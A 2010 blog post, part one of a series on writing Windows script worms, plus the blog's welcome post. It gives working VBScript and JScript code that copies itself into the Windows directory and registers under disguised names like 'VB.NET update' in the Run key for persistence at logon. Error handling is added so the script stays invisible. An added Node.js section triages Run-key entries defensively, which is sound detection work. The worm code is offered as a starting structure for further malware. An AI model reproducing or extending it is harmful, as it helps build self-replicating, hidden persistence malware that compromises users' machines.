Anatomy of a windows script worm 0x01: Simple start

Posted in JavaScript, Visual Basic, Windows on June 1, 2010 by syn0x

Microsoft® Windows® Script Host (WSH) is a language-independent scripting host for Windows Script compatible scripting engines. It brings simple, powerful, and flexible scripting to the Windows 32-bit platform, allowing you to run scripts from both the Windows desktop and the command prompt.

Windows Script Host is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation. It is also pretty straightforward to use when writing a virus or worm.

In the many virus collections around the internet we find lots and lots of malware (worms dropping adware, botnet clients, etc.) written in VBS, because it is simple, has ActiveX objects for countless tasks (sockets, Internet Explorer manipulation, shell usage, registry manipulation, sending mail, etc.) and because it is easy to learn: after all, it is Basic!

For the next series of posts I will try to show you the basic functions behind many well known malware scripts.

Let us first see the WScript Object. The WScript object is the root object of the Windows Script Host object model hierarchy. It never needs to be instantiated before invoking its properties and methods, and it is always available from any script file. From this object we will use the following property and method:

  • ScriptFullName: Returns the full path of the currently running script.
  • CreateObject(strProgID[,strPrefix]): Creates a COM object.

Now we can create another kind of object, WScript.Shell. You create a WshShell object whenever you want to run a program locally, manipulate the contents of the registry, create a shortcut, or access a system folder. The WshShell object provides the Environment collection, which lets you read environment variables (such as WINDIR, PATH, or PROMPT), something that proves very useful when writing virus code. We will use these simple methods of the object:

  • Run(strCommand, [intWindowStyle], [bWaitOnReturn]): Runs a program in a new process.
  • RegWrite(strName, anyValue [,strType]): Creates a new key, adds another value-name to an existing key (and assigns it a value), or changes the value of an existing value-name.
  • ExpandEnvironmentStrings(strString): Returns an environment variable's expanded value.

Now, by combining these simple methods we can quickly mimic the basic starting structure of a simple vbs worm. The process is simple:

  1. create a copy of itself in the Windows directory
  2. add a value under the registry Run key so that the script is launched at every logon (HKCU\...\Run entries run when the user logs on, which in practice means every time the machine is started and used).

The following educational code shows that process:

' sample VBS replicator script
' create a WScript.Shell object
Set oShell = WScript.CreateObject("WScript.Shell")
' resolve %WinDir% once; both the copy and the registry value need it
strWinDir = oShell.ExpandEnvironmentStrings("%WinDir%")
' replicate the script to the windows directory (cmd /C runs one command and exits)
oShell.Run "cmd /C COPY """ & WScript.ScriptFullName & """ """ & strWinDir & "\vb32qwin.vbs"""
' write a value under the Run key so the copy is launched at every logon
' (WSH host switches take two slashes: //B is batch mode, no dialogs; only the path is quoted)
oShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\VB.NET update", "wscript //B """ & strWinDir & "\vb32qwin.vbs""", "REG_SZ"

This code, without any payload, is in fact the basic initial sequence of almost any VBS worm or virus coded nowadays, or at least of the ones I have found in recent virus collections.

One interesting detail is that the same code can be written in JScript (Windows Script Host runs .js/.jse files as well as .vbs) with only small changes of syntax:

// sample JScript replicator script
// create a WScript.Shell object
var oShell = new ActiveXObject("WScript.Shell");
// resolve %WinDir% once; both the copy and the registry value need it
var winDir = oShell.ExpandEnvironmentStrings("%WinDir%");
// replicate the script to the windows directory
try {
  oShell.Run("cmd /C COPY \"" + WScript.ScriptFullName + "\" \"" + winDir + "\\JSwin32.jse\"");
} catch (e) {}
// write a value under the Run key so the copy is launched at every logon.
// Only the script path is quoted: wrapping the whole command in quotes would make
// Windows look for an executable of that full name. WSH host switches take two
// slashes (//B = batch mode, no dialogs).
try {
  oShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\JavaScript Runtime",
                  "wscript //B \"" + winDir + "\\JSwin32.jse\"", "REG_SZ");
} catch (e) {}

I have just added try...catch blocks to preserve the invisibility of our script: without them, an error during the copy or the registry write would make wscript pop up an error dialog and stop; with them, nothing is shown and the script simply carries on.
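The persistence both snippets leave behind is also what you hunt for on the defensive side. The following is an added example, not code from the original post: a small Node.js script (no ActiveX objects, so it runs outside WSH) that tokenizes Run-key values the way CreateProcess reads a command line, then flags entries that start wscript/cscript/mshta or launch a script file by extension, and notes when the script sits directly in the Windows directory or under Temp/AppData. The registry values in `SAMPLE_RUN_ENTRIES` are constructed for the example, modelled on what the two snippets write, and the function names `splitCommandLine`, `classifyRunEntry` and `triageRunEntries` are my own.

```javascript
// Added example, not from the original post: triage of Windows "Run" key
// values, written for Node.js (no ActiveX, so it runs outside WSH).
// The registry values at the bottom are constructed for the example.

// Tokenize a command line the way CommandLineToArgvW / the MS C runtime do:
// whitespace separates arguments, double quotes group, and a backslash is
// literal unless it precedes a quote (2n backslashes + quote -> n backslashes
// and a delimiter; 2n+1 backslashes + quote -> n backslashes and a literal quote).
function splitCommandLine(cmd) {
  const argv = [];
  let cur = '';
  let inQuotes = false;
  let haveToken = false;
  let i = 0;
  while (i < cmd.length) {
    const c = cmd[i];
    if (c === '\\') {
      let n = 0;
      while (cmd[i] === '\\') { n++; i++; }
      if (cmd[i] === '"') {
        cur += '\\'.repeat(Math.floor(n / 2));
        if (n % 2 === 1) { cur += '"'; i++; } // odd count: escaped literal quote
        // even count: the quote is a delimiter, handled on the next pass
      } else {
        cur += '\\'.repeat(n);
      }
      haveToken = true;
    } else if (c === '"') {
      inQuotes = !inQuotes; haveToken = true; i++;
    } else if (!inQuotes && (c === ' ' || c === '\t')) {
      if (haveToken) { argv.push(cur); cur = ''; haveToken = false; }
      i++;
    } else {
      cur += c; haveToken = true; i++;
    }
  }
  if (haveToken) argv.push(cur);
  return argv;
}

const SCRIPT_HOSTS = new Set(['wscript', 'cscript', 'mshta']);
const SCRIPT_EXT = /\.(vbs|vbe|js|jse|wsf|wsh|hta)$/i;
const WINDOWS_DIR = /^(%windir%|%systemroot%|[a-z]:\\windows)\\[^\\]+$/i;

// Classify one Run-key entry: which script host it uses (if any), which script
// it launches, and why a responder should look at it.
function classifyRunEntry(name, value) {
  const result = { name, host: null, script: null, reasons: [], suspicious: false };
  let argv = splitCommandLine(value);
  if (argv.length === 0) {
    result.reasons.push('empty value');
    result.suspicious = true;
    return result;
  }
  if (/\s/.test(argv[0])) {
    // The whole command was wrapped in quotes, so CreateProcess would take
    // "wscript //B C:\..." as the executable name. Seen in copy-pasted script
    // worms; re-split the token to recover what was meant.
    result.reasons.push('executable token contains whitespace (entire command quoted)');
    argv = splitCommandLine(argv[0]).concat(argv.slice(1));
  }
  const exe = argv[0];
  const base = exe.replace(/^.*[\\/]/, '').replace(/\.exe$/i, '').toLowerCase();
  if (SCRIPT_HOSTS.has(base)) {
    result.host = base;
    // WSH host switches take two slashes (//B, //Nologo); the first token that is
    // not a switch is the script. Single-slash tokens are skipped as well so the
    // "/b" form found in worm samples is still resolved.
    result.script = argv.slice(1).find(a => !a.startsWith('/')) || null;
    result.reasons.push('script host ' + base + ' in Run key');
  } else if (SCRIPT_EXT.test(exe)) {
    // A bare script path relies on the file association to pick the host.
    result.script = exe;
    result.reasons.push('script file launched through its file association');
  }
  if (result.script !== null) {
    if (WINDOWS_DIR.test(result.script)) result.reasons.push('script dropped directly in the Windows directory');
    if (/\\(temp|appdata)\\/i.test(result.script)) result.reasons.push('script under Temp or AppData');
  }
  result.suspicious = result.reasons.length > 0;
  return result;
}

// Run every [name, value] pair through the classifier and keep the ones worth a look.
function triageRunEntries(entries) {
  return entries.map(([n, v]) => classifyRunEntry(n, v)).filter(r => r.suspicious);
}

// Constructed sample: the two values the snippets above write (one of them with
// the whole command quoted and a single-slash switch, as found in samples), a
// script launched by association, and an ordinary program entry for contrast.
const SAMPLE_RUN_ENTRIES = [
  ['VB.NET update', 'wscript //B "C:\\WINDOWS\\vb32qwin.vbs"'],
  ['JavaScript Runtime', '"wscript /b C:\\WINDOWS\\JSwin32.jse"'],
  ['Updater', 'C:\\Users\\alice\\AppData\\Roaming\\update.vbe'],
  ['OneDrive', '"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background'],
];

const TRIAGE_REPORT = triageRunEntries(SAMPLE_RUN_ENTRIES)
  .map(r => r.name + ': ' + r.reasons.join('; '))
  .join('\n');
console.log(TRIAGE_REPORT);
```

To run it against a real machine, export the entries with `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` (and the HKLM counterpart) and feed each name/value pair to `classifyRunEntry`. The tokenizer is the important part: a naive split on spaces would miss the mis-quoted form entirely, and quoting is exactly where hand-written script worms most often go wrong.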

In further posts I will write the code in only one of these languages, but you can now choose for yourself which one to use.

[0x00] welcome

Posted in blog on May 31, 2010 by syn0x

welcome to «artificial eden».

here we will study some forms of artificial life..

  • computer virus theory (worms, polymorphism, old virii, ..)
  • artificial life games (Core War, Darwin, ..)
  • etc..

my main objective is to learn something, hope you can do the same!

Needless to say, all the tutorials I write will be for educational purposes only, and you are on your own if you run offensive code on your machine ;)
